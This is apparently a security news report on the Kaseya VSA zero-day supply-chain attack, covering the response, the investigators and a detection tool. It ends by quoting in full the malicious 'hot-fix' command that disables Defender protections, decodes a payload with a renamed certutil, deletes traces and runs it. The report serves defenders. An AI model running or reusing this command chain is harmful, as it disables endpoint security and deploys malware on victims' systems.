On Friday, July 2, Kaseya, a Miami-based enterprise IT firm, was at the center of a sophisticated zero-day attack. The attack leveraged the company’s on-premises VSA product, a remote monitoring and management tool to reach Kaseya customers using the tool. This VSA product is supplied either as a hosted cloud service, or via on-premises VSA servers. Kaseya has clarified that the attack has only affected on-premises customers, however, as a precaution, the company has also shut down their cloud-based services. Since then, all customers using the VSA product have been urgently advised to shut down their VSA servers until further notice and asked to stay tuned for developing updates.
The company is currently working with the FBI, CISA, Mandiant (FireEye), and other cybersecurity forensics firms to conduct detailed investigations. On July 3, a Compromise Detection Tool was rolled out to approximately 900 Kaseya customers upon request as well as updates to its functionality. Kaseya notes that this tool analyzes a system (either VSA server or managed endpoint) to determine whether any indicators of compromise (IoC) are present.
- The “Kaseya VSA Agent Hot-fix” procedure ran the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe